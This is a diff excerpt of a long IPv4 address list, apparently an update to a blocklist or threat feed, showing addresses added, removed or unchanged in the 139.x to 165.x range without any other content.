 139.59.255.59
-139.59.26.97
-139.59.30.241
 139.59.31.236
 139.59.37.86
+139.59.42.255
+139.59.45.98
 139.59.46.169
-139.59.65.144
 139.59.67.215
+139.59.68.239
+139.59.7.115
 139.59.70.142
+139.59.76.7
+139.59.78.95
 139.59.8.21
-139.59.97.230
+139.59.81.65
+139.59.83.162
+139.59.92.30
+139.95.0.186
+139.99.189.205
 139.99.251.166
-139.99.30.169
 139.99.36.21
-139.99.77.184
 14.0.197.67
-14.102.38.135
-14.102.43.215
-14.115.209.227
-14.116.194.118
-14.116.221.112
-14.139.58.151
+14.0.206.168
+14.102.101.248
+14.102.74.17
+14.102.74.99
+14.116.184.240
+14.116.211.11
+14.116.214.218
 14.143.3.30
+14.161.10.88
 14.161.17.193
 14.161.27.163
-14.173.234.121
-14.174.33.77
-14.177.232.0
-14.177.239.168
-14.18.120.74
+14.18.119.55
 14.194.76.134
+14.207.162.219
+14.22.81.1
 14.224.160.150
 14.225.192.13
-14.225.205.4
 14.225.206.100
-14.225.206.91
 14.225.210.201
 14.225.211.192
-14.225.212.120
 14.225.254.229
 14.225.254.249
-14.225.254.88
 14.23.44.10
 14.238.7.210
-14.240.51.0
-14.29.171.127
+14.29.208.189
 14.29.218.130
 14.32.90.4
-14.33.96.4
 14.34.46.185
-14.38.8.52
-14.42.169.240
+14.39.65.29
+14.41.72.242
 14.42.184.197
-14.42.42.181
-14.43.212.5
 14.43.231.49
+14.43.64.15
 14.44.12.176
 14.45.187.92
-14.48.58.180
+14.46.91.140
 14.48.88.170
+14.49.119.88
 14.49.206.32
 14.52.100.135
 14.52.210.76
-14.54.241.158
+14.53.134.163
+14.54.22.11
+14.54.46.207
+14.55.109.45
 14.56.76.82
-14.63.162.98
-14.63.216.89
-14.97.82.3
+14.63.221.137
+14.97.218.142
+14.98.78.11
 14.99.14.158
-14.99.157.247
-14.99.175.106
 14.99.23.98
-14.99.254.18
 14.99.34.118
 14.99.4.82
-140.143.162.33
+14.99.71.11
 140.143.171.80
-140.150.224.10
-140.174.170.25
-140.190.1.246
+140.228.21.43
+140.238.177.83
 140.238.182.238
 140.238.190.142
+140.246.97.188
+140.86.39.162
 140.99.157.162
-140.99.159.196
+140.99.209.229
 140.99.217.43
 140.99.234.34
 140.99.4.7
-141.105.36.146
-141.136.47.165
-141.145.194.107
+141.147.173.78
 141.147.47.32
-141.148.159.69
 141.148.84.47
-141.157.14.149
-141.170.214.44
-141.94.17.140
-141.94.254.138
+141.255.162.218
+141.94.106.15
+141.94.143.46
+141.95.32.122
 141.95.40.67
 141.98.10.150
-141.98.101.133
+141.98.102.243
+141.98.11.108
 141.98.11.11
+141.98.11.54
 141.98.11.60
 141.98.11.73
-141.98.24.24
+141.98.24.220
 141.98.6.80
 141.98.6.94
-142.4.1.183
-142.4.22.16
-142.4.24.200
-142.44.210.28
-142.44.215.54
+142.129.112.169
+142.166.127.59
+142.197.225.209
+142.215.160.22
+142.4.207.244
 142.44.241.173
+142.44.247.73
 142.93.112.39
-142.93.115.32
 142.93.115.5
 142.93.129.80
 142.93.14.104
+142.93.143.112
 142.93.153.3
-142.93.187.197
+142.93.158.96
+142.93.163.183
+142.93.18.15
 142.93.194.227
 142.93.201.51
 142.93.201.88
-142.93.209.170
+142.93.210.193
+142.93.213.92
 142.93.215.255
 142.93.216.174
-142.93.216.65
-142.93.219.133
-142.93.226.169
+142.93.220.110
 142.93.229.134
-142.93.50.8
-142.93.52.241
+142.93.241.93
+142.93.31.18
+142.93.47.95
+142.93.50.99
 142.93.58.181
-142.93.64.15
+142.93.62.53
 142.93.7.198
-142.93.78.223
 143.110.146.234
+143.110.156.182
 143.110.159.114
-143.110.159.86
-143.110.174.217
 143.110.176.216
+143.110.182.33
 143.110.218.229
-143.110.218.98
-143.110.219.172
+143.110.220.40
 143.110.227.81
-143.110.236.60
+143.110.232.31
 143.110.241.56
-143.110.246.83
-143.110.248.85
+143.110.243.154
+143.110.245.66
+143.110.248.139
 143.110.248.86
+143.198.105.73
+143.198.115.4
 143.198.117.165
+143.198.126.248
+143.198.140.188
 143.198.146.239
 143.198.146.93
 143.198.147.146
 143.198.150.226
+143.198.150.51
 143.198.154.97
+143.198.155.231
 143.198.166.138
 143.198.171.37
 143.198.180.130
-143.198.191.39
-143.198.192.19
 143.198.193.104
-143.198.196.95
-143.198.204.19
-143.198.217.171
-143.198.218.16
+143.198.194.242
+143.198.197.182
+143.198.200.155
+143.198.203.21
 143.198.222.239
-143.198.236.21
+143.198.234.238
+143.198.237.171
 143.198.24.3
-143.198.45.56
-143.198.49.250
+143.198.43.241
+143.198.46.47
 143.198.53.72
-143.198.66.0
-143.198.72.96
+143.198.67.224
+143.198.69.230
 143.198.8.62
-143.198.84.156
-143.198.90.201
-143.198.98.252
-143.198.99.235
-143.202.209.61
+143.198.89.109
 143.244.134.243
 143.244.140.236
 143.244.144.227
-143.244.161.152
 143.244.162.174
-143.244.172.59
 143.244.180.103
 143.244.181.123
-143.244.182.229
-143.244.50.173
-143.255.53.4
+143.244.189.54
+143.244.190.237
 143.255.54.218
-143.42.1.201
-143.42.1.34
+143.42.0.20
+143.42.0.97
+143.42.1.185
+143.42.1.189
+143.42.1.191
+143.42.1.213
+143.42.1.53
+143.42.1.71
 143.42.118.5
+143.42.16.39
 143.42.16.81
+143.42.164.127
 143.42.164.34
 143.42.173.101
-143.42.227.140
-143.42.53.138
-143.42.53.31
-143.42.63.253
-143.90.109.165
-144.123.151.50
-144.123.41.162
-144.126.131.216
+143.42.173.60
+143.42.53.176
+143.42.63.60
+143.47.51.98
+143.92.42.54
+144.123.180.125
 144.126.192.113
 144.126.198.24
-144.126.201.42
 144.126.202.105
 144.126.204.43
-144.126.210.158
-144.126.217.16
+144.126.210.70
 144.126.224.108
 144.126.224.39
-144.126.238.239
-144.16.112.36
+144.129.87.210
+144.172.73.16
+144.217.16.48
+144.217.180.167
 144.217.195.24
-144.217.65.45
+144.217.248.43
+144.217.84.62
 144.217.87.192
 144.22.215.0
 144.22.231.248
 144.22.236.165
 144.24.105.158
+144.24.154.203
 144.24.170.79
-144.34.162.4
+144.24.197.112
+144.255.68.64
+144.34.133.122
 144.34.171.163
+144.34.177.244
 144.34.177.92
 144.34.212.207
-144.48.49.72
-144.48.74.249
+144.48.170.194
+144.76.74.227
 144.91.104.177
 144.91.112.8
 144.91.120.67
 144.91.127.21
 144.91.69.13
+144.91.78.188
 144.91.88.120
+145.14.156.144
 145.239.198.34
+146.148.67.133
+146.158.106.249
 146.185.159.124
+146.19.168.190
 146.19.191.108
-146.190.105.48
 146.190.105.8
+146.190.119.114
 146.190.119.189
 146.190.121.89
-146.190.147.220
+146.190.132.1
 146.190.152.5
+146.190.154.234
+146.190.160.11
 146.190.162.83
-146.190.208.223
-146.190.212.236
-146.190.217.229
+146.190.166.168
+146.190.219.71
 146.190.222.176
 146.190.228.94
 146.190.230.95
+146.190.242.116
+146.190.38.28
+146.190.41.214
 146.190.54.164
+146.190.57.24
 146.190.64.200
-146.190.65.27
 146.190.71.232
+146.190.87.184
 146.190.87.246
+146.190.92.6
+146.190.96.229
 146.190.97.183
-146.196.121.62
+146.190.98.93
 146.196.65.139
-146.56.151.124
 146.56.158.134
+146.56.162.101
 146.59.127.25
-146.59.178.97
 146.59.228.111
-146.59.250.225
 146.59.83.19
 146.70.117.122
 146.70.124.179
 146.70.184.231
-146.88.234.47
-146.88.241.108
-146.88.241.128
-146.88.241.198
-146.88.241.58
-146.88.241.68
-146.88.241.78
-147.0.250.10
+146.70.192.172
+146.70.41.208
+146.70.94.3
+147.135.137.204
+147.135.211.208
 147.135.4.9
-147.139.138.154
-147.139.191.123
-147.139.41.53
+147.139.209.176
+147.139.210.103
+147.139.73.255
 147.182.130.98
 147.182.145.89
+147.182.154.58
 147.182.160.30
 147.182.168.210
 147.182.171.152
 147.182.179.237
 147.182.179.97
-147.182.188.81
 147.182.194.121
-147.182.211.205
 147.182.218.64
 147.182.221.40
 147.182.224.240
 147.182.225.225
-147.182.228.52
-147.182.242.21
 147.182.245.184
 147.182.245.3
-147.189.145.39
+147.182.254.237
+147.189.147.110
+147.203.255.20
+147.235.215.146
 147.30.81.75
-147.78.103.113
-147.78.103.136
 147.78.103.137
-147.78.103.182
-147.78.103.204
-147.78.103.243
-147.78.103.53
-147.78.103.87
-147.78.103.98
-147.78.47.10
+147.78.103.144
+147.78.103.164
+147.78.103.190
+147.78.103.228
+147.78.103.249
+147.78.103.33
+147.78.103.93
+147.78.47.223
 147.78.47.227
 147.78.47.249
 147.78.47.250
-148.101.83.40
+148.113.13.20
+148.113.15.47
 148.113.6.177
 148.153.110.76
-148.244.170.211
-148.59.251.168
-148.66.145.171
+148.218.65.21
+148.63.39.153
+148.66.132.190
+148.70.157.154
 148.71.154.69
-148.72.207.163
-148.72.209.73
-148.72.211.177
-148.72.245.234
-148.72.247.54
-149.126.21.146
-149.129.129.119
-149.129.241.221
-149.129.50.37
-149.129.51.193
-149.202.79.129
-149.34.244.242
+148.72.209.121
+148.72.214.194
+149.102.136.249
+149.129.232.221
+149.129.239.236
+149.129.251.229
+149.202.79.101
 149.5.172.117
 149.5.172.120
-149.62.233.18
-149.78.186.30
-15.152.54.114
+149.5.174.138
+149.56.203.1
+149.78.185.200
 15.204.204.153
+15.204.9.174
 15.206.163.194
+15.235.197.87
 150.109.205.234
-150.109.255.216
-150.109.5.46
+150.117.218.51
+150.117.239.175
 150.129.105.120
-150.136.143.186
+150.129.108.154
 150.136.242.192
 150.136.32.211
-150.138.117.4
 150.138.78.166
+150.158.193.54
 150.158.40.91
-150.158.93.223
 150.165.77.215
+150.185.252.222
 150.230.235.117
-150.230.250.229
+150.230.27.122
 150.230.59.27
-150.230.93.233
 150.242.140.105
-150.95.91.227
 151.0.165.235
+151.0.27.165
 151.106.112.32
-151.106.113.60
-151.106.125.165
 151.106.125.193
+151.106.125.253
+151.106.34.161
 151.106.35.1
 151.106.35.184
 151.106.38.219
 151.106.41.111
-151.106.42.50
-151.115.74.117
-151.177.1.232
-151.233.32.98
-151.237.82.206
 151.252.197.3
 151.253.124.222
 151.69.161.84
-151.80.91.213
 151.80.91.215
 151.80.91.221
-151.80.91.223
-152.136.123.36
-152.136.235.236
-152.136.51.117
+152.136.194.70
 152.168.201.83
-152.200.151.149
 152.200.181.42
 152.228.162.85
 152.228.164.249
-152.228.171.144
 152.250.234.164
 152.32.131.195
-152.32.132.233
 152.32.139.8
-152.32.141.130
+152.32.140.200
+152.32.141.202
 152.32.141.206
 152.32.141.84
 152.32.143.105
+152.32.144.44
 152.32.147.115
 152.32.148.123
-152.32.149.235
-152.32.150.152
+152.32.149.245
 152.32.151.71
-152.32.159.65
+152.32.157.167
 152.32.159.77
 152.32.164.156
-152.32.164.23
+152.32.165.114
+152.32.167.43
+152.32.168.136
 152.32.169.104
+152.32.170.110
+152.32.171.15
+152.32.172.153
 152.32.174.199
-152.32.174.92
-152.32.180.93
-152.32.181.13
+152.32.178.8
+152.32.181.45
 152.32.183.86
 152.32.186.106
 152.32.187.174
+152.32.187.191
 152.32.190.176
-152.32.191.185
+152.32.192.222
+152.32.200.193
+152.32.200.79
+152.32.205.73
 152.32.206.73
 152.32.207.115
+152.32.207.130
 152.32.207.133
 152.32.207.174
 152.32.208.142
-152.32.208.150
 152.32.208.215
+152.32.210.125
+152.32.210.168
 152.32.212.29
 152.32.213.224
-152.32.214.240
 152.32.214.69
 152.32.215.190
 152.32.215.5
 152.32.217.133
-152.32.220.18
+152.32.225.245
 152.32.226.125
 152.32.227.52
-152.32.231.235
-152.32.233.110
+152.32.228.20
+152.32.233.16
 152.32.233.236
 152.32.234.128
-152.32.234.33
-152.32.236.73
+152.32.234.183
+152.32.236.101
+152.32.237.24
 152.32.240.210
-152.32.242.11
+152.32.242.73
 152.32.245.214
-152.32.245.216
 152.32.253.58
-152.69.162.253
 152.70.113.55
 152.70.217.117
-152.86.64.193
+152.70.86.6
+152.89.198.113
+152.89.198.15
 152.89.198.196
-153.101.193.152
-153.101.41.226
-153.121.36.96
+152.89.44.184
+153.0.155.5
+153.101.196.37
+153.101.196.38
+153.101.232.107
 153.125.69.143
-153.126.175.72
-153.238.138.136
-153.3.29.189
+153.19.169.191
 153.34.82.87
-153.92.210.106
-153.92.210.159
+153.37.177.219
 153.92.221.220
-153.92.5.229
-154.12.37.17
+153.92.74.228
+154.116.13.24
+154.120.246.26
+154.127.163.140
 154.127.86.66
+154.16.49.54
 154.202.56.196
+154.205.22.94
 154.208.9.176
+154.209.125.124
 154.209.4.95
-154.26.135.46
-154.40.52.44
-154.41.229.247
-154.41.251.212
-154.49.137.161
+154.221.25.18
+154.221.27.121
 154.56.137.25
-154.62.108.243
 154.62.109.71
+154.66.220.45
 154.68.18.82
 154.68.39.6
-154.72.194.207
+154.72.50.105
 154.73.25.116
+154.73.53.193
 154.74.133.74
+154.81.220.137
 154.83.12.80
-154.88.30.29
 154.88.6.222
-154.91.138.170
-154.92.19.213
-155.133.130.25
+154.91.83.239
+155.254.193.48
 155.94.196.225
 156.0.130.229
 156.224.22.172
 156.224.22.211
-156.232.10.4
+156.224.22.91
+156.230.245.74
+156.232.10.176
+156.234.191.140
 156.236.64.227
 156.236.71.192
 156.236.72.238
-156.251.130.170
 156.251.17.159
-156.54.40.52
-156.67.216.15
-156.67.221.169
-157.122.183.220
-157.122.198.35
-157.122.198.36
-157.230.113.181
-157.230.120.136
-157.230.133.15
-157.230.144.211
+156.251.176.170
+156.67.208.155
+156.67.76.17
+156.96.114.70
+156.96.60.55
+157.119.79.154
+157.122.247.186
+157.230.1.224
+157.230.125.144
+157.230.17.29
 157.230.178.127
 157.230.185.9
 157.230.20.248
-157.230.209.3
+157.230.208.92
+157.230.211.191
 157.230.216.10
-157.230.221.51
-157.230.23.46
+157.230.22.170
+157.230.228.237
 157.230.233.140
 157.230.236.196
 157.230.236.83
 157.230.253.244
 157.230.254.228
+157.230.28.142
 157.230.41.201
-157.230.42.191
+157.230.45.177
 157.230.49.63
-157.230.50.190
-157.230.52.208
+157.230.50.207
 157.230.6.213
-157.230.6.216
-157.230.62.157
-157.230.83.80
+157.230.84.180
 157.230.91.199
-157.230.99.12
+157.230.91.241
 157.245.101.119
-157.245.109.198
+157.245.104.196
 157.245.109.35
-157.245.113.241
+157.245.12.46
+157.245.121.11
+157.245.121.29
+157.245.129.95
 157.245.147.26
-157.245.154.129
+157.245.154.124
 157.245.158.39
+157.245.196.35
 157.245.203.8
-157.245.204.50
+157.245.206.155
 157.245.216.197
-157.245.248.106
-157.245.40.222
 157.245.49.201
 157.245.59.109
 157.245.69.32
+157.245.69.67
 157.245.78.166
 157.245.96.171
 157.245.98.245
 157.255.28.157
 157.7.114.193
 157.7.200.128
+157.7.205.164
 157.7.207.25
-157.7.78.54
-157.7.87.10
 158.101.213.149
-158.140.185.59
-158.160.101.95
-158.160.104.38
-158.160.105.43
-158.160.107.106
-158.160.110.42
+158.101.23.56
+158.101.26.231
 158.160.17.133
 158.160.2.235
-158.160.34.1
+158.160.24.212
 158.160.38.134
+158.160.42.227
 158.160.48.91
 158.160.59.87
 158.160.6.234
 158.160.60.216
 158.174.125.19
-158.181.25.68
-158.255.7.157
-158.51.121.10
+158.180.79.103
+158.51.121.133
 158.58.186.126
 158.69.111.17
-158.69.124.84
-158.69.80.160
 158.69.80.165
 158.69.92.169
+159.100.13.152
+159.118.74.154
 159.192.122.25
+159.192.140.191
 159.192.143.249
 159.192.3.67
 159.196.170.30
 159.203.102.122
+159.203.11.247
 159.203.113.193
 159.203.128.174
-159.203.130.78
+159.203.129.103
 159.203.165.156
-159.203.170.123
+159.203.170.197
 159.203.170.22
-159.203.172.105
 159.203.179.230
+159.203.181.214
 159.203.182.222
 159.203.186.114
-159.203.192.10
-159.203.192.14
-159.203.192.16
+159.203.192.11
 159.203.192.17
-159.203.192.18
-159.203.192.41
-159.203.208.12
-159.203.208.15
+159.203.192.33
+159.203.192.45
+159.203.192.46
 159.203.208.18
-159.203.208.30
-159.203.208.36
-159.203.224.31
-159.203.224.35
-159.203.224.38
-159.203.224.9
+159.203.224.19
+159.203.224.33
+159.203.224.36
 159.203.240.10
-159.203.240.5
-159.203.42.15
-159.203.44.43
-159.203.63.67
-159.203.65.34
+159.203.44.105
 159.203.72.14
 159.203.81.114
-159.203.84.97
 159.203.85.196
+159.203.91.246
 159.203.94.228
-159.223.102.13
 159.223.102.145
 159.223.107.179
-159.223.108.26
-159.223.114.225
-159.223.117.20
 159.223.12.224
-159.223.120.180
 159.223.125.135
-159.223.130.202
+159.223.129.59
+159.223.135.216
 159.223.136.180
-159.223.157.255
-159.223.18.139
-159.223.189.221
+159.223.138.32
+159.223.140.32
+159.223.154.6
 159.223.200.138
+159.223.201.81
 159.223.21.148
-159.223.217.87
-159.223.32.246
-159.223.45.100
-159.223.49.144
-159.223.50.201
+159.223.4.195
 159.223.50.39
+159.223.57.252
+159.223.57.67
 159.223.59.81
-159.223.68.191
+159.223.69.158
 159.223.71.99
 159.223.82.118
-159.223.86.114
+159.223.86.231
 159.223.9.242
+159.223.92.245
 159.65.117.174
 159.65.118.51
 159.65.12.109
-159.65.12.30
 159.65.120.34
-159.65.124.66
+159.65.123.176
+159.65.127.239
 159.65.128.16
 159.65.129.227
 159.65.130.142
+159.65.130.187
 159.65.132.116
+159.65.133.176
+159.65.133.50
 159.65.133.84
 159.65.134.171
 159.65.136.44
 159.65.137.180
-159.65.138.217
 159.65.144.167
+159.65.144.20
 159.65.145.76
 159.65.15.22
-159.65.150.25
+159.65.150.108
+159.65.151.241
 159.65.153.241
 159.65.154.92
 159.65.155.154
-159.65.17.177
 159.65.193.236
+159.65.194.58
 159.65.2.158
 159.65.206.41
-159.65.227.87
+159.65.207.182
 159.65.231.164
 159.65.235.114
 159.65.238.250
+159.65.240.232
 159.65.249.79
 159.65.34.202
-159.65.41.104
 159.65.53.91
 159.65.55.28
+159.65.58.104
 159.65.59.197
 159.65.6.201
+159.65.64.70
+159.65.64.76
 159.65.65.75
 159.65.82.249
-159.65.84.193
+159.65.83.155
+159.65.84.119
 159.65.91.105
-159.75.182.71
-159.89.100.71
-159.89.109.248
 159.89.113.122
-159.89.121.165
-159.89.131.172
+159.89.153.54
 159.89.161.186
-159.89.163.158
-159.89.171.217
-159.89.172.158
-159.89.195.23
-159.89.199.244
+159.89.165.164
+159.89.171.28
 159.89.205.52
 159.89.232.114
-159.89.34.114
+159.89.236.160
 159.89.40.119
 159.89.47.106
-159.89.82.18
-159.89.83.196
-159.89.87.91
-160.120.247.113
-160.153.155.32
+159.89.92.122
+159.89.95.98
+160.124.103.55
+160.153.155.194
 160.153.252.142
 160.154.0.242
 160.154.0.244
 160.154.94.42
 160.238.36.79
-160.251.121.83
 160.251.171.67
+160.251.5.64
 160.251.55.50
 161.132.105.250
+161.132.122.195
+161.132.183.24
 161.132.214.236
 161.132.219.115
-161.18.228.75
-161.35.108.241
+161.132.37.58
+161.18.32.43
+161.35.1.238
 161.35.119.216
-161.35.125.167
-161.35.129.1
 161.35.155.246
-161.35.16.112
-161.35.16.90
-161.35.176.95
+161.35.157.58
+161.35.177.39
+161.35.190.246
 161.35.190.56
-161.35.194.172
+161.35.199.80
+161.35.2.247
+161.35.204.228
 161.35.21.48
-161.35.211.137
-161.35.22.109
-161.35.230.183
+161.35.23.230
+161.35.230.3
 161.35.236.158
-161.35.238.241
 161.35.27.144
 161.35.50.20
-161.35.52.207
+161.35.51.101
+161.35.51.29
 161.35.59.177
-161.35.75.223
 161.35.76.93
 161.35.79.157
 161.35.79.199
 161.82.233.179
 161.82.233.183
-161.97.130.63
 161.97.157.51
 161.97.158.142
-161.97.173.1
 161.97.74.246
-162.0.229.183
-162.14.97.205
-162.144.146.197
-162.17.98.109
-162.19.170.45
+162.0.211.141
+162.0.223.76
+162.155.222.42
+162.186.17.147
+162.19.170.56
 162.19.198.17
 162.212.158.214
-162.214.54.240
-162.215.214.86
+162.214.147.146
+162.214.55.69
 162.216.149.10
-162.216.149.102
-162.216.149.106
-162.216.149.111
-162.216.149.112
+162.216.149.105
+162.216.149.114
 162.216.149.115
-162.216.149.117
-162.216.149.119
-162.216.149.12
-162.216.149.122
-162.216.149.125
-162.216.149.130
-162.216.149.133
-162.216.149.135
-162.216.149.139
-162.216.149.14
-162.216.149.140
-162.216.149.141
-162.216.149.147
-162.216.149.148
+162.216.149.118
+162.216.149.123
+162.216.149.126
+162.216.149.137
+162.216.149.145
+162.216.149.146
 162.216.149.154
-162.216.149.158
-162.216.149.162
-162.216.149.173
-162.216.149.178
-162.216.149.181
-162.216.149.186
+162.216.149.167
+162.216.149.180
+162.216.149.187
 162.216.149.189
-162.216.149.190
+162.216.149.193
+162.216.149.202
 162.216.149.203
-162.216.149.204
-162.216.149.210
-162.216.149.220
-162.216.149.23
-162.216.149.231
-162.216.149.235
-162.216.149.238
-162.216.149.239
-162.216.149.244
-162.216.149.245
-162.216.149.248
-162.216.149.28
+162.216.149.207
+162.216.149.209
+162.216.149.214
+162.216.149.219
+162.216.149.230
+162.216.149.234
+162.216.149.3
+162.216.149.30
 162.216.149.32
-162.216.149.33
-162.216.149.45
-162.216.149.49
+162.216.149.37
+162.216.149.47
+162.216.149.51
+162.216.149.54
 162.216.149.55
-162.216.149.57
-162.216.149.64
+162.216.149.56
+162.216.149.6
+162.216.149.63
+162.216.149.67
+162.216.149.68
 162.216.149.7
-162.216.149.70
-162.216.149.76
-162.216.149.81
-162.216.149.92
-162.216.150.103
+162.216.149.79
+162.216.149.83
+162.216.149.84
+162.216.149.85
+162.216.149.87
+162.216.149.90
+162.216.149.95
+162.216.150.10
+162.216.150.100
+162.216.150.101
+162.216.150.102
 162.216.150.108
-162.216.150.111
-162.216.150.122
-162.216.150.126
-162.216.150.129
-162.216.150.144
+162.216.150.115
+162.216.150.127
+162.216.150.134
+162.216.150.147
+162.216.150.148
+162.216.150.15
 162.216.150.151
-162.216.150.154
-162.216.150.156
-162.216.150.160
-162.216.150.164
+162.216.150.163
+162.216.150.167
+162.216.150.171
 162.216.150.173
 162.216.150.174
-162.216.150.175
-162.216.150.178
+162.216.150.182
+162.216.150.183
 162.216.150.184
+162.216.150.186
+162.216.150.188
 162.216.150.191
-162.216.150.195
-162.216.150.204
-162.216.150.206
+162.216.150.194
+162.216.150.199
+162.216.150.207
+162.216.150.208
 162.216.150.21
-162.216.150.211
-162.216.150.222
+162.216.150.210
+162.216.150.221
 162.216.150.226
-162.216.150.23
-162.216.150.230
-162.216.150.239
-162.216.150.24
-162.216.150.241
-162.216.150.242
-162.216.150.251
-162.216.150.26
+162.216.150.235
+162.216.150.237
+162.216.150.238
+162.216.150.245
+162.216.150.249
+162.216.150.25
+162.216.150.3
 162.216.150.30
-162.216.150.33
-162.216.150.34
-162.216.150.35
-162.216.150.37
-162.216.150.39
-162.216.150.40
-162.216.150.5
-162.216.150.56
-162.216.150.6
-162.216.150.66
-162.216.150.67
-162.216.150.73
+162.216.150.4
+162.216.150.47
+162.216.150.61
+162.216.150.7
+162.216.150.81
+162.216.150.82
+162.216.150.86
+162.216.150.87
 162.216.150.88
-162.216.150.9
-162.216.150.99
-162.221.192.58
-162.221.192.59
-162.221.192.60
+162.216.150.92
+162.216.150.93
+162.216.150.94
+162.216.18.113
+162.221.192.28
 162.221.192.61
-162.221.192.62
 162.240.211.231
+162.240.239.190
 162.240.51.185
-162.241.114.39
+162.241.114.56
+162.241.114.75
 162.241.124.124
-162.241.126.176
+162.241.126.244
 162.241.141.162
-162.241.174.216
-162.241.201.224
 162.241.211.155
-162.241.70.19
-162.241.71.115
 162.241.71.211
 162.241.87.50
-162.243.128.11
-162.243.128.30
+162.243.116.41
+162.243.128.42
 162.243.128.43
-162.243.128.6
-162.243.129.10
-162.243.129.11
-162.243.129.30
-162.243.130.10
-162.243.130.37
-162.243.131.16
-162.243.131.30
-162.243.131.34
+162.243.128.49
+162.243.129.13
+162.243.129.37
+162.243.129.39
+162.243.129.7
+162.243.130.25
+162.243.132.15
 162.243.132.16
-162.243.132.32
-162.243.132.34
-162.243.132.52
-162.243.134.64
-162.243.135.15
-162.243.135.22
+162.243.132.33
+162.243.133.43
+162.243.133.48
+162.243.134.28
+162.243.134.31
+162.243.134.9
+162.243.135.24
+162.243.135.38
+162.243.136.41
+162.243.136.52
 162.243.136.58
+162.243.136.68
+162.243.136.71
+162.243.136.75
 162.243.137.10
-162.243.137.18
-162.243.137.4
+162.243.137.14
+162.243.137.16
+162.243.137.17
+162.243.137.35
+162.243.137.5
 162.243.138.11
-162.243.138.59
-162.243.138.9
-162.243.140.14
-162.243.140.21
-162.243.140.52
-162.243.141.18
-162.243.141.30
-162.243.142.52
-162.243.143.11
-162.243.143.14
-162.243.143.24
-162.243.144.10
+162.243.138.16
+162.243.138.49
+162.243.138.62
+162.243.139.10
+162.243.139.35
+162.243.139.43
+162.243.139.9
+162.243.141.15
+162.243.141.19
+162.243.141.41
+162.243.142.17
+162.243.143.12
+162.243.143.48
+162.243.143.50
+162.243.143.57
 162.243.144.12
-162.243.144.9
+162.243.144.4
+162.243.145.15
 162.243.145.22
-162.243.145.40
 162.243.145.44
 162.243.145.45
-162.243.147.16
+162.243.146.49
+162.243.146.62
+162.243.146.70
 162.243.147.17
-162.243.147.18
-162.243.147.34
-162.243.147.4
-162.243.147.5
-162.243.148.20
+162.243.148.8
 162.243.149.12
+162.243.149.18
+162.243.149.26
+162.243.149.30
 162.243.150.12
-162.243.150.38
-162.243.150.8
+162.243.150.44
+162.243.150.45
+162.243.150.6
+162.243.150.9
+162.243.151.37
+162.243.151.6
 162.243.152.20
-162.243.152.25
-162.243.161.105
+162.243.152.4
+162.243.175.43
 162.243.184.251
 162.243.186.177
-162.243.187.162
 162.243.228.106
 162.243.34.111
-162.243.48.133
 162.243.61.162
 162.244.78.27
-162.246.23.7
-162.251.5.152
+162.247.74.204
+162.253.187.114
 162.62.54.151
-163.123.141.197
 163.123.143.10
 163.123.143.252
-163.123.181.143
-163.139.169.79
 163.172.101.166
 163.172.147.100
-163.197.217.16
+163.172.175.22
+163.172.211.53
+163.197.213.23
 163.197.218.159
+163.30.39.140
 163.47.36.34
+163.5.129.99
 163.5.194.135
+163.53.206.147
+163.53.206.233
 164.132.222.4
 164.132.51.188
-164.152.21.67
-164.160.4.27
+164.132.84.209
 164.163.200.12
 164.163.23.19
-164.163.25.142
-164.163.98.49
-164.164.112.10
+164.163.25.149
+164.163.25.255
 164.177.31.66
 164.52.0.93
+164.52.36.214
 164.58.210.186
 164.68.106.102
-164.68.117.115
-164.68.127.115
-164.77.117.10
+164.68.125.108
+164.77.119.34
 164.88.198.52
+164.88.198.91
 164.90.140.95
-164.90.154.67
 164.90.170.31
-164.90.172.83
-164.90.186.77
-164.90.190.247
 164.90.191.216
+164.90.202.89
 164.90.205.35
+164.90.210.8
+164.90.217.23
 164.90.222.93
 164.90.224.134
-164.90.229.196
-164.90.239.158
-164.92.110.182
-164.92.116.194
+164.90.233.55
+164.92.117.229
 164.92.118.96
+164.92.128.171
 164.92.130.82
-164.92.139.226
 164.92.142.240
-164.92.157.100
 164.92.159.65
-164.92.161.202
-164.92.167.231
+164.92.170.149
 164.92.177.69
+164.92.180.225
 164.92.192.25
 164.92.193.23
+164.92.196.69
+164.92.217.229
 164.92.225.82
 164.92.232.89
 164.92.235.79
-164.92.253.189
+164.92.71.12
+164.92.80.209
 164.92.80.220
 164.92.82.21
 164.92.84.255
 164.92.93.179
-164.92.94.124
-165.1.79.194
+165.154.10.196
 165.154.113.115
 165.154.113.33
 165.154.118.188
 165.154.119.11
 165.154.119.123
-165.154.119.15
 165.154.119.165
+165.154.119.220
+165.154.119.253
 165.154.119.27
+165.154.119.37
 165.154.119.44
-165.154.119.50
 165.154.119.8
 165.154.121.59
 165.154.128.127
 165.154.128.213
+165.154.128.218
 165.154.128.221
 165.154.128.222
-165.154.130.34
-165.154.132.35
-165.154.133.204
-165.154.133.81
-165.154.134.16
+165.154.128.227
 165.154.134.177
 165.154.134.187
-165.154.134.201
+165.154.134.195
 165.154.134.205
 165.154.134.208
 165.154.145.233
-165.154.147.72
 165.154.161.156
-165.154.17.159
+165.154.183.140
+165.154.183.23
 165.154.225.154
 165.154.233.178
+165.154.233.79
 165.154.242.141
 165.154.242.168
 165.154.253.219
 165.154.253.81
+165.154.32.166
 165.154.36.152
 165.154.36.182
 165.154.36.240
 165.154.36.4
 165.154.36.72
 165.154.36.96
+165.154.42.45
+165.154.43.143
+165.154.44.58
 165.154.51.236
-165.154.57.181
+165.154.57.202
 165.154.57.237
-165.154.59.22
 165.154.8.112
+165.154.92.123
 165.16.44.5
 165.22.1.57
 165.22.1.73
+165.22.10.179
 165.22.101.24
 165.22.101.75
 165.22.102.124
-165.22.102.161
+165.22.106.178
 165.22.108.223
-165.22.109.216
+165.22.111.102
 165.22.120.187
 165.22.120.216
 165.22.16.134
-165.22.186.140
+165.22.184.99
 165.22.186.45
-165.22.187.91
-165.22.192.132
+165.22.20.10
 165.22.210.239
 165.22.218.42
-165.22.220.65
-165.22.223.72
+165.22.221.230
 165.22.23.152
-165.22.234.248
-165.22.235.202
-165.22.235.224
-165.22.242.64
+165.22.240.159
+165.22.245.74
 165.22.249.151
 165.22.249.192
-165.22.29.187
 165.22.3.107
-165.22.32.212
-165.22.49.184
-165.22.51.113
-165.22.57.68
 165.22.60.26
-165.22.62.203
-165.22.62.225
-165.22.74.203
 165.22.76.161
 165.22.88.23
-165.22.97.194
 165.22.98.248
-165.227.106.20
-165.227.118.71
+165.227.101.226
 165.227.119.21
+165.227.123.61
 165.227.127.120
-165.227.16.153
-165.227.161.170
+165.227.131.122
 165.227.166.247
 165.227.167.225
